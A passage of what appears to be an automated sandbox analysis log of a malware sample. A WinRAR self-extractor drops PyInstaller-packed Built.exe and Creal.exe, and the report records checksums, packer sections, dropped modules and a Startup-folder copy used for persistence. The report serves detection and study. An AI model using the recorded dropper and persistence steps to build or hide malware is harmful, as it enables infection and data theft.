              Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: Creal.exe, 00000005.00000002.2439456162.00007FFDA4634000.00000002.00000001.01000000.00000024.sdmp
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000000.2087291779.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp, #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Built.exe, Built.exe, 00000004.00000002.2206641962.00007FFDA4331000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Built.exe, Built.exe, 00000004.00000002.2202084879.00007FFDA35A1000.00000040.00000001.01000000.00000011.sdmp, Creal.exe, 00000005.00000002.2433119716.00007FFD8A1FF000.00000002.00000001.01000000.0000002E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Creal.exe, 00000005.00000002.2417262722.00000203E7250000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: Creal.exe, 00000005.00000002.2435297538.00007FFD93FA8000.00000002.00000001.01000000.00000015.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Creal.exe, 00000002.00000003.2114341483.0000016B5EEBA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: Built.exe, Built.exe, 00000004.00000002.2174692109.00007FFD93615000.00000040.00000001.01000000.00000019.sdmp, Creal.exe, 00000005.00000002.2433373548.00007FFD8AFA5000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Built.exe, Built.exe, 00000004.00000002.2193375861.00007FFDA33E1000.00000040.00000001.01000000.00000017.sdmp, Creal.exe, 00000005.00000002.2436764632.00007FFD9A26E000.00000002.00000001.01000000.0000002C.sdmp
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: VCRUNTIME140.dll.2.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD93657A20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFD93657A20
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5019218
              Source: sqlite3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0xa890d
              Source: _BLAKE2b.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x120c3
              Source: _ed25519.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10701
              Source: _raw_ocb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x11289
              Source: _chacha20.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x351a
              Source: _BLAKE2b.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x120c3
              Source: _raw_aesni.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x646e
              Source: _MD5.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xa544
              Source: _raw_ocb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x11289
              Source: _curve25519.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1023e
              Source: _MD4.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x9e2d
              Source: _raw_des3.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1d746
              Source: _ghash_clmul.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xac61
              Source: libcrypto-3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _keccak.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdc9d
              Source: _ghash_portable.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xe5b7
              Source: libffi-8.dll.3.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _SHA256.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x6eb8
              Source: _ssl.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x1ee96
              Source: _SHA512.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdf25
              Source: _raw_ofb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10ea2
              Source: _MD2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xeba3
              Source: _rust.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x77a3da
              Source: python312.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x1c0022
              Source: _ctypes.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x16009
              Source: _MD5.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xa544
              Source: _raw_aesni.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x646e
              Source: Built.exe.0.drStatic PE information: real checksum: 0x7810dc should be: 0x787620
              Source: _raw_cfb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xed0d
              Source: _raw_cast.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xc443
              Source: _raw_cbc.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x5ba2
              Source: _ed25519.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10701
              Source: _pkcs1_decode.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10c34
              Source: _Salsa20.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xb9f9
              Source: _pkcs1_decode.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x10c34
              Source: _modexp.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x172cd
              Source: _decimal.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x2a089
              Source: select.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0xa27a
              Source: _curve448.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1a70d
              Source: _strxor.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x48ff
              Source: _MD4.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x9e2d
              Source: _raw_ecb.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x4671
              Source: _raw_ctr.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdcf9
              Source: _raw_des.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x13f62
              Source: _poly1305.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbf54
              Source: _SHA384.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1655d
              Source: _poly1305.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbf54
              Source: _sqlite3.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x15dfb
              Source: libssl-3.dll.3.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: _raw_aes.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbec9
              Source: _SHA224.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1037a
              Source: _cffi_backend.cp313-win_amd64.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x2f4d9
              Source: _hashlib.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0xcc8b
              Source: _raw_des3.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1d746
              Source: _ARC4.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x9b3a
              Source: _SHA384.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1655d
              Source: _ec_ws.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xbf2b1
              Source: _cpuid_c.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdccc
              Source: _cffi_backend.cp313-win_amd64.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x2f4d9
              Source: _raw_cfb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xed0d
              Source: _ed448.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1eae6
              Source: _curve25519.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1023e
              Source: _SHA224.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1037a
              Source: _curve448.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1a70d
              Source: _strxor.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x48ff
              Source: _raw_des.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x13f62
              Source: _raw_ofb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x10ea2
              Source: _raw_ctr.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdcf9
              Source: _ec_ws.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbf2b1
              Source: _keccak.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdc9d
              Source: _queue.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x11a1d
              Source: _socket.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x196aa
              Source: _raw_eksblowfish.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xca96
              Source: _ARC4.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x9b3a
              Source: _raw_arc2.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x13220
              Source: _BLAKE2s.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x5f6b
              Source: _ed448.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x1eae6
              Source: _SHA256.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x6eb8
              Source: _MD2.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xeba3
              Source: _ghash_portable.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xe5b7
              Source: unicodedata.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x4e672
              Source: _SHA1.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xf079
              Source: _raw_eksblowfish.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xca96
              Source: _chacha20.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x351a
              Source: _scrypt.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x4714
              Source: _raw_blowfish.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xe4b7
              Source: _raw_arc2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x13220
              Source: _lzma.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x22ff2
              Source: _scrypt.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x4714
              Source: _modexp.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x172cd
              Source: _RIPEMD160.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x69e1
              Source: _rust.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x77a3da
              Source: _raw_cbc.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x5ba2
              Source: _Salsa20.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xb9f9
              Source: _raw_cast.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xc443
              Source: _ghash_clmul.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xac61
              Source: _raw_blowfish.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xe4b7
              Source: _RIPEMD160.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0x69e1
              Source: _BLAKE2s.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x5f6b
              Source: _bz2.pyd.3.drStatic PE information: real checksum: 0x0 should be: 0x1bdb0
              Source: _raw_aes.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbec9
              Source: _cpuid_c.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xdccc
              Source: _raw_ecb.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x4671
              Source: _SHA1.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xf079
              Source: _SHA512.pyd.24.drStatic PE information: real checksum: 0x0 should be: 0xdf25
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: section name: .didat
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: section name: _RDATA
              Source: VCRUNTIME140.dll.2.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
              Source: libcrypto-3.dll.2.drStatic PE information: section name: .00cfg
              Source: libssl-3.dll.2.drStatic PE information: section name: .00cfg
              Source: python313.dll.2.drStatic PE information: section name: PyRuntim
              Source: VCRUNTIME140.dll.3.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.3.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.3.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.24.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.24.drStatic PE information: section name: _RDATA
              Source: libcrypto-3.dll.24.drStatic PE information: section name: .00cfg
              Source: libssl-3.dll.24.drStatic PE information: section name: .00cfg
              Source: python313.dll.24.drStatic PE information: section name: PyRuntim
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924382D8 push rdi; iretd 4_2_00007FFD924382DA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92439327 push rsp; ret 4_2_00007FFD92439328
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435C31 push r10; ret 4_2_00007FFD92435C33
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438419 push r10; retf 4_2_00007FFD92438485
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9243808B push r12; iretd 4_2_00007FFD9243809F
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435EB4 push rsp; iretd 4_2_00007FFD92435EB5
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435E67 push rdi; iretd 4_2_00007FFD92435E69
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92439686 push rdx; ret 4_2_00007FFD924396DD
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437689 push r12; ret 4_2_00007FFD924376CD
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F56 push r12; ret 4_2_00007FFD92435F73
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438F42 push rsp; iretq 4_2_00007FFD92438F43
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F01 push r12; ret 4_2_00007FFD92435F10
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435FB9 push r10; ret 4_2_00007FFD92435FCC
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435F7B push r8; ret 4_2_00007FFD92435F83
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437F67 push rbp; iretq 4_2_00007FFD92437F68
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92436859 push rsi; ret 4_2_00007FFD92436890
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92437FFF push r12; ret 4_2_00007FFD9243804A
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD924394B9 push rsp; retf 4_2_00007FFD924394BA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CED push rdx; ret 4_2_00007FFD92435CF7
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CE0 push r10; retf 4_2_00007FFD92435CE2
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435CE5 push r8; ret 4_2_00007FFD92435CEB
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435D06 push r12; ret 4_2_00007FFD92435D08
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92438DBF push rsp; retf 4_2_00007FFD92438DC0
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD9243763E push rbp; retf 4_2_00007FFD92437657
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435DF7 push r10; retf 4_2_00007FFD92435DFA
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD92435E18 push rsp; ret 4_2_00007FFD92435E1C
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFD935B4331 push rcx; ret 4_2_00007FFD935B4332
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FFDA33ED9D8 push rsp; iretd 4_2_00007FFDA33ED9D9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B267D push rbx; retf 5_2_00007FFD8A0B2685
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B27AE push rsp; iretd 5_2_00007FFD8A0B27B9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF44331 push rcx; ret 5_2_00007FFD8AF44332
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_ARC4.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\sqlite3.dll
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\python3.dll
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_blowfish.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des3.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_poly1305.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\python313.dll
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_strxor.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_Salsa20.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_eksblowfish.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2b.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_blowfish.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\_uuid.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cbc.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_chacha20.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\libcrypto-3.dll
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_keccak.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\_overlapped.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dll
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve448.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pyd
              Source: C:\Users\user\Desktop\Built.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pyd
              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_pkcs1_decode.pyd
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_chacha20.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_ARC4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\python3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\libssl-3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\Built.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2b.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\rar.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
